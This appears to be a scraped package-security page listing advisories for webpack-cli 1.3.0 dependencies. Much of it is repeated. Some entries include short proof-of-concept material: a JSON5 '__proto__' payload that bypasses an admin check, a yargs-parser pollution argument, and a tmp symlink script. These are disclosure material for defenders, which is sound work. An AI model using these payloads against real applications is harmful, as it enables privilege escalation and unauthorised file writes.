Version Details and Security Vulnerabilities

📦

webpack-cli

1.3.0

Comparision Betweeen 1.3.0 and 1.0.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Version 1.3.0 Details

Webpack-cli version 1.3.0 represents a significant evolution from version 1.0.0, offering developers a richer and more versatile command-line interface for managing Webpack configurations. The jump from a simple "cli for configuring webpack" to a "CLI for webpack & friends" signals a broader scope and enhanced capabilities. Version 1.3.0 introduces a wealth of new dependencies, reflecting its expanded functionality. These include modules like got for HTTP requests, diff for comparing files, listr for elegant task management, yargs for command-line argument parsing, and inquirer for interactive command-line prompts – all essential for a more sophisticated CLI experience.

Notably, version 1.3.0 incorporates tools for code transformation and modernization, such as jscodeshift, recast, and a suite of Babel dependencies (babel-core, babel-preset-es2015, babel-preset-stage-3), likely indicating support for more complex code modifications and integration with modern JavaScript standards. The inclusion of webpack-addons further points to an ecosystem of utility tools designed to enhance the Webpack workflow.

From a developer's perspective, upgrading to version 1.3.0 unlocks features for easier configuration, more streamlined workflows, and better integration with modern JavaScript development practices. The testing and linting tools have equally been upgraded, supporting current testing requirements. The addition of packages like fit-commit-js and lint-staged also indicates a focus on improving code quality and commit practices within projects utilizing webpack. All these new features allow the developer to stay on top of their project and produce better results in a shorter amount of time.

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

webpack-cli

1.3.0

Comparision Betweeen 1.3.0 and 1.0.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

N/A

Unpacked Size

N/A

Version 1.3.0 Details

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 1.3.0 of the package webpack-cli.

All Security Vulnerabilities

All the vulnerabilities related to the version 1.3.0 of the package

Summary:

Got allows a redirect to a UNIX socket

Details:

The got package before 11.8.5 and 12.1.0 for Node.js allows a redirect to a UNIX socket.

Details about got@6.7.1

Summary:

yargs-parser Vulnerable to Prototype Pollution

Details:

Affected versions of yargs-parser are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of Object, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument --foo.__proto__.bar baz' adds a bar property with value baz to all objects. This is only exploitable if attackers have control over the arguments being passed to yargs-parser.

Recommendation

Upgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.

Details about yargs-parser@4.2.1

Summary:

Prototype Pollution in Ajv

Details:

An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)

Details about ajv@4.11.8

Summary:

Prototype Pollution in JSON5 via Parse Method

Details:

The parse method of the JSON5 library before and including version 2.2.1 does not restrict parsing of keys named __proto__, allowing specially crafted strings to pollute the prototype of the resulting object.

This vulnerability pollutes the prototype of the object returned by JSON5.parse and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.

Impact

This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from JSON5.parse. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.

Mitigation

This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.

Details

Suppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. To accomplish this, they accept a JSON blob from the user, parse it using JSON5.parse, confirm that the provided data does not set some sensitive keys, and then performs the risky operation using the validated data:

const JSON5 = require('json5');

const doSomethingDangerous = (props) => {
  if (props.isAdmin) {
    console.log('Doing dangerous thing as admin.');
  } else {
    console.log('Doing dangerous thing as user.');
  }
};

const secCheckKeysSet = (obj, searchKeys) => {
  let searchKeyFound = false;
  Object.keys(obj).forEach((key) => {
    if (searchKeys.indexOf(key) > -1) {
      searchKeyFound = true;
    }
  });
  return searchKeyFound;
};

const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props); // "Doing dangerous thing as user."
} else {
  throw new Error('Forbidden...');
}

If the user attempts to set the isAdmin key, their request will be rejected:

const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props);
} else {
  throw new Error('Forbidden...'); // Error: Forbidden...
}

However, users can instead set the __proto__ key to {"isAdmin": true}. JSON5 will parse this key and will set the isAdmin key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:

const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
  throw new Error('Forbidden...');
}

Details about json5@0.5.1

Summary:

tmp allows arbitrary temporary file / directory write via symbolic link dir parameter

Details:

Summary

tmp@0.2.3 is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir parameter.

Details

According to the documentation there are some conditions that must be held:

// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50

Other breaking changes, i.e.

- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks

are still in place.

In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.


// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
     absolute paths are fine as long as they point to a location under the system's default temporary directory.
     Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, 
     as tmp will not check the availability of the path, nor will it establish the requested path for you.

Related issue: https://github.com/raszi/node-tmp/issues/207.

The issue occurs because _resolvePath does not properly handle symbolic link when resolving paths:

// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
  if (name.startsWith(tmpDir)) {
    return path.resolve(name);
  } else {
    return path.resolve(path.join(tmpDir, name));
  }
}

If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:

// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
  if (option === 'name') {
    // assert that name is not absolute and does not contain a path
    if (path.isAbsolute(name))
      throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
    // must not fail on valid .<name> or ..<name> or similar such constructs
    let basename = path.basename(name);
    if (basename === '..' || basename === '.' || basename !== name)
      throw new Error(`${option} option must not contain a path, found "${name}".`);
  }
  else { // if (option === 'dir' || option === 'template') {
    // assert that dir or template are relative to tmpDir
    if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
    }
    let resolvedPath = _resolvePath(name, tmpDir); //<--- 
    if (!resolvedPath.startsWith(tmpDir))
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
  }
}

PoC

The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible. Tested on a Linux machine.

Setup: create a symbolic link inside the tmpDir that points to a directory outside of it

mkdir $HOME/mydir1

ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir

check the folder is empty:

ls -lha $HOME/mydir1 | grep "tmp-"

run the poc

node main.js
File:  /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".

the temporary file is created under $HOME/mydir1 (outside the tmpDir):

ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user    0 Apr  X XX:XX tmp-[random-id]

main.js

// npm i tmp@0.2.3

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

A Potential fix could be to call fs.realpathSync (or similar) that resolves also symbolic links.

function _resolvePath(name, tmpDir) {
  let resolvedPath;
  if (name.startsWith(tmpDir)) {
    resolvedPath = path.resolve(name);
  } else {
    resolvedPath = path.resolve(path.join(tmpDir, name));
  }
  return fs.realpathSync(resolvedPath);
}

Impact

Arbitrary temporary file / directory write via symlink

Details about tmp@0.0.29

Summary:

Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code

Details:

Impact

Using Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the path.evaluate()or path.evaluateTruthy() internal Babel methods.

Known affected plugins are:

@babel/plugin-transform-runtime
@babel/preset-env when using its useBuiltIns option
Any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider, such as babel-plugin-polyfill-corejs3, babel-plugin-polyfill-corejs2, babel-plugin-polyfill-es-shims, babel-plugin-polyfill-regenerator

No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.

Users that only compile trusted code are not impacted.

Patches

The vulnerability has been fixed in @babel/traverse@7.23.2.

Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6.

Workarounds

Upgrade @babel/traverse to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core >=7.23.2 will automatically pull in a non-vulnerable version.
If you cannot upgrade @babel/traverse and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse versions:
- @babel/plugin-transform-runtime v7.23.2
- @babel/preset-env v7.23.2
- @babel/helper-define-polyfill-provider v0.4.3
- babel-plugin-polyfill-corejs2 v0.4.6
- babel-plugin-polyfill-corejs3 v0.8.5
- babel-plugin-polyfill-es-shims v0.10.0
- babel-plugin-polyfill-regenerator v0.5.3

Details about babel-traverse@6.26.0

Summary:

Regular Expression Denial of Service (ReDoS) in cross-spawn

Details:

Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

Details about cross-spawn@5.1.0

Summary:

Arbitrary Code Execution in underscore

Details:

The package underscore from 1.13.0-0 and before 1.13.0-2, from 1.3.2 and before 1.12.1 are vulnerable to Arbitrary Code Execution via the template function, particularly when a variable property is passed as an argument as it is not sanitized.

Details about underscore@1.6.0

Summary:

Regular Expression Denial of Service (ReDoS) in micromatch

Details:

The NPM package micromatch prior to version 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persisted prior to https://github.com/micromatch/micromatch/pull/266. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching.

Details about micromatch@2.3.11

Summary:

Regular Expression Denial of Service (ReDoS) in braces

Details:

A vulnerability was found in Braces versions prior to 2.3.1. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.

Details about braces@1.8.5

Summary:

Regular Expression Denial of Service in braces

Details:

Versions of braces prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.

Recommendation

Upgrade to version 2.3.1 or higher.

Details about braces@1.8.5

Summary:

Uncontrolled resource consumption in braces

Details:

The NPM package braces fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In lib/parse.js, if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.

Details about braces@1.8.5

Summary:

Prototype pollution in webpack loader-utils

Details:

Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils prior to version 2.0.3 via the name variable in parseQuery.js.

Details about loader-utils@0.2.17

Summary:

Improper Privilege Management in shelljs

Details:

shelljs is vulnerable to Improper Privilege Management

Details about shelljs@0.7.7

Summary:

Improper Privilege Management in shelljs

Details:

Impact

Output from the synchronous version of shell.exec() may be visible to other users on the same system. You may be affected if you execute shell.exec() in multi-user Mac, Linux, or WSL environments, or if you execute shell.exec() as the root user.

Other shelljs functions (including the asynchronous version of shell.exec()) are not impacted.

Patches

Patched in shelljs 0.8.5

Workarounds

Recommended action is to upgrade to 0.8.5.

References

https://huntr.dev/bounties/50996581-c08e-4eed-a90e-c0bac082679c/

For more information

If you have any questions or comments about this advisory:

Ask at https://github.com/shelljs/shelljs/issues/1058
Open an issue at https://github.com/shelljs/shelljs/issues/new

Details about shelljs@0.7.7

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 1.3.0 of the package webpack-cli.

All Security Vulnerabilities

All the vulnerabilities related to the version 1.3.0 of the package

Summary:

Got allows a redirect to a UNIX socket

Details:

The got package before 11.8.5 and 12.1.0 for Node.js allows a redirect to a UNIX socket.

Details about got@6.7.1

Summary:

yargs-parser Vulnerable to Prototype Pollution

Details:

Recommendation

Upgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.

Details about yargs-parser@4.2.1

Summary:

Prototype Pollution in Ajv

Details:

Details about ajv@4.11.8

Summary:

Prototype Pollution in JSON5 via Parse Method

Details:

Impact

Mitigation

This vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.

Details

const JSON5 = require('json5');

const doSomethingDangerous = (props) => {
  if (props.isAdmin) {
    console.log('Doing dangerous thing as admin.');
  } else {
    console.log('Doing dangerous thing as user.');
  }
};

const secCheckKeysSet = (obj, searchKeys) => {
  let searchKeyFound = false;
  Object.keys(obj).forEach((key) => {
    if (searchKeys.indexOf(key) > -1) {
      searchKeyFound = true;
    }
  });
  return searchKeyFound;
};

const props = JSON5.parse('{"foo": "bar"}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props); // "Doing dangerous thing as user."
} else {
  throw new Error('Forbidden...');
}

If the user attempts to set the isAdmin key, their request will be rejected:

const props = JSON5.parse('{"foo": "bar", "isAdmin": true}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props);
} else {
  throw new Error('Forbidden...'); // Error: Forbidden...
}

const props = JSON5.parse('{"foo": "bar", "__proto__": {"isAdmin": true}}');
if (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {
  doSomethingDangerous(props); // "Doing dangerous thing as admin."
} else {
  throw new Error('Forbidden...');
}

Details about json5@0.5.1

Summary:

tmp allows arbitrary temporary file / directory write via symbolic link dir parameter

Details:

Summary

tmp@0.2.3 is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir parameter.

Details

According to the documentation there are some conditions that must be held:

// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50

Other breaking changes, i.e.

- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks

are still in place.

In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.


// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
     absolute paths are fine as long as they point to a location under the system's default temporary directory.
     Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, 
     as tmp will not check the availability of the path, nor will it establish the requested path for you.

Related issue: https://github.com/raszi/node-tmp/issues/207.

The issue occurs because _resolvePath does not properly handle symbolic link when resolving paths:

// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
  if (name.startsWith(tmpDir)) {
    return path.resolve(name);
  } else {
    return path.resolve(path.join(tmpDir, name));
  }
}

If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:

// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
  if (option === 'name') {
    // assert that name is not absolute and does not contain a path
    if (path.isAbsolute(name))
      throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
    // must not fail on valid .<name> or ..<name> or similar such constructs
    let basename = path.basename(name);
    if (basename === '..' || basename === '.' || basename !== name)
      throw new Error(`${option} option must not contain a path, found "${name}".`);
  }
  else { // if (option === 'dir' || option === 'template') {
    // assert that dir or template are relative to tmpDir
    if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
    }
    let resolvedPath = _resolvePath(name, tmpDir); //<--- 
    if (!resolvedPath.startsWith(tmpDir))
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
  }
}

PoC

The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible. Tested on a Linux machine.

Setup: create a symbolic link inside the tmpDir that points to a directory outside of it

mkdir $HOME/mydir1

ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir

check the folder is empty:

ls -lha $HOME/mydir1 | grep "tmp-"

run the poc

node main.js
File:  /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".

the temporary file is created under $HOME/mydir1 (outside the tmpDir):

ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user    0 Apr  X XX:XX tmp-[random-id]

main.js

// npm i tmp@0.2.3

const tmp = require('tmp');

const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);

try {
    tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
    console.log('test 1:', err.message)
}

try {
    tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
    console.log('test 2:', err.message)
}

try {
    const fs = require('node:fs');
    const resolved = fs.realpathSync('/tmp/evil-dir');
    tmp.fileSync({ 'dir': resolved});
} catch (err) {
    console.log('test 3:', err.message)
}

A Potential fix could be to call fs.realpathSync (or similar) that resolves also symbolic links.

function _resolvePath(name, tmpDir) {
  let resolvedPath;
  if (name.startsWith(tmpDir)) {
    resolvedPath = path.resolve(name);
  } else {
    resolvedPath = path.resolve(path.join(tmpDir, name));
  }
  return fs.realpathSync(resolvedPath);
}

Impact

Arbitrary temporary file / directory write via symlink

Details about tmp@0.0.29

Summary:

Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code

Details:

Impact

Known affected plugins are:

@babel/plugin-transform-runtime
@babel/preset-env when using its useBuiltIns option
Any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider, such as babel-plugin-polyfill-corejs3, babel-plugin-polyfill-corejs2, babel-plugin-polyfill-es-shims, babel-plugin-polyfill-regenerator

No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.

Users that only compile trusted code are not impacted.

Patches

The vulnerability has been fixed in @babel/traverse@7.23.2.

Babel 6 does not receive security fixes anymore (see Babel's security policy), hence there is no patch planned for babel-traverse@6.

Workarounds

Upgrade @babel/traverse to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. @babel/core >=7.23.2 will automatically pull in a non-vulnerable version.
If you cannot upgrade @babel/traverse and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected @babel/traverse versions:
- @babel/plugin-transform-runtime v7.23.2
- @babel/preset-env v7.23.2
- @babel/helper-define-polyfill-provider v0.4.3
- babel-plugin-polyfill-corejs2 v0.4.6
- babel-plugin-polyfill-corejs3 v0.8.5
- babel-plugin-polyfill-es-shims v0.10.0
- babel-plugin-polyfill-regenerator v0.5.3

Details about babel-traverse@6.26.0

Summary:

Regular Expression Denial of Service (ReDoS) in cross-spawn

Details:

Details about cross-spawn@5.1.0

Summary:

Arbitrary Code Execution in underscore

Details:

Details about underscore@1.6.0

Summary:

Regular Expression Denial of Service (ReDoS) in micromatch

Details:

Details about micromatch@2.3.11

Summary:

Regular Expression Denial of Service (ReDoS) in braces

Details:

A vulnerability was found in Braces versions prior to 2.3.1. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.

Details about braces@1.8.5

Summary:

Regular Expression Denial of Service in braces

Details:

Recommendation

Upgrade to version 2.3.1 or higher.

Details about braces@1.8.5

Summary:

Uncontrolled resource consumption in braces

Details:

Details about braces@1.8.5

Summary:

Prototype pollution in webpack loader-utils

Details:

Prototype pollution vulnerability in function parseQuery in parseQuery.js in webpack loader-utils prior to version 2.0.3 via the name variable in parseQuery.js.

Details about loader-utils@0.2.17

Summary:

Improper Privilege Management in shelljs

Details:

shelljs is vulnerable to Improper Privilege Management

Details about shelljs@0.7.7

Summary:

Improper Privilege Management in shelljs

Details:

Impact

Other shelljs functions (including the asynchronous version of shell.exec()) are not impacted.

Patches

Patched in shelljs 0.8.5

Workarounds

Recommended action is to upgrade to 0.8.5.

References

https://huntr.dev/bounties/50996581-c08e-4eed-a90e-c0bac082679c/

For more information

If you have any questions or comments about this advisory:

Ask at https://github.com/shelljs/shelljs/issues/1058
Open an issue at https://github.com/shelljs/shelljs/issues/new

Details about shelljs@0.7.7

Version Details and Security Vulnerabilities

webpack-cli

Comparision Betweeen 1.3.0 and 1.0.0

Version 1.3.0 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

webpack-cli

Comparision Betweeen 1.3.0 and 1.0.0

Version 1.3.0 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

got@6.7.1 GHSA-pfrx-2q88-qq97 5.3

yargs-parser@4.2.1 GHSA-p9pc-299p-vxgp 5.3

Recommendation

ajv@4.11.8 GHSA-v88g-cgmw-v5xw 5.6

json5@0.5.1 GHSA-9c47-m6qq-7p4h 7.1

Impact

Mitigation

Details

tmp@0.0.29 GHSA-52f5-9888-hmc6 2.5

Summary

Details

PoC

Impact

babel-traverse@6.26.0 GHSA-67hx-6x53-jw92 9.3

Impact

Patches

Workarounds

cross-spawn@5.1.0 GHSA-3xgq-45jj-v275 7.7

underscore@1.6.0 GHSA-cf4h-3jhx-xvhq 9.8

micromatch@2.3.11 GHSA-952p-6rrq-rcjv 5.3

braces@1.8.5 GHSA-cwfw-4gq5-mrqx N/A

braces@1.8.5 GHSA-g95f-p29q-9xw4 3.7

Recommendation

braces@1.8.5 GHSA-grv7-fg5c-xmjg 7.5

loader-utils@0.2.17 GHSA-76p3-8jx3-jpfq 9.8

shelljs@0.7.7 GHSA-4rq4-32rv-6wp6 7.1

shelljs@0.7.7 GHSA-64g7-mvw6-v9qj N/A

Impact

Patches

Workarounds

References

For more information

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

got@6.7.1 GHSA-pfrx-2q88-qq97 5.3

yargs-parser@4.2.1 GHSA-p9pc-299p-vxgp 5.3

Recommendation

ajv@4.11.8 GHSA-v88g-cgmw-v5xw 5.6

json5@0.5.1 GHSA-9c47-m6qq-7p4h 7.1

Impact

Mitigation

Details

tmp@0.0.29 GHSA-52f5-9888-hmc6 2.5

Summary

Details

PoC

Impact

babel-traverse@6.26.0 GHSA-67hx-6x53-jw92 9.3

Impact

Patches

Workarounds

cross-spawn@5.1.0 GHSA-3xgq-45jj-v275 7.7

underscore@1.6.0 GHSA-cf4h-3jhx-xvhq 9.8

micromatch@2.3.11 GHSA-952p-6rrq-rcjv 5.3

braces@1.8.5 GHSA-cwfw-4gq5-mrqx N/A

braces@1.8.5 GHSA-g95f-p29q-9xw4 3.7

Recommendation

braces@1.8.5 GHSA-grv7-fg5c-xmjg 7.5

loader-utils@0.2.17 GHSA-76p3-8jx3-jpfq 9.8

shelljs@0.7.7 GHSA-4rq4-32rv-6wp6 7.1

shelljs@0.7.7 GHSA-64g7-mvw6-v9qj N/A

Impact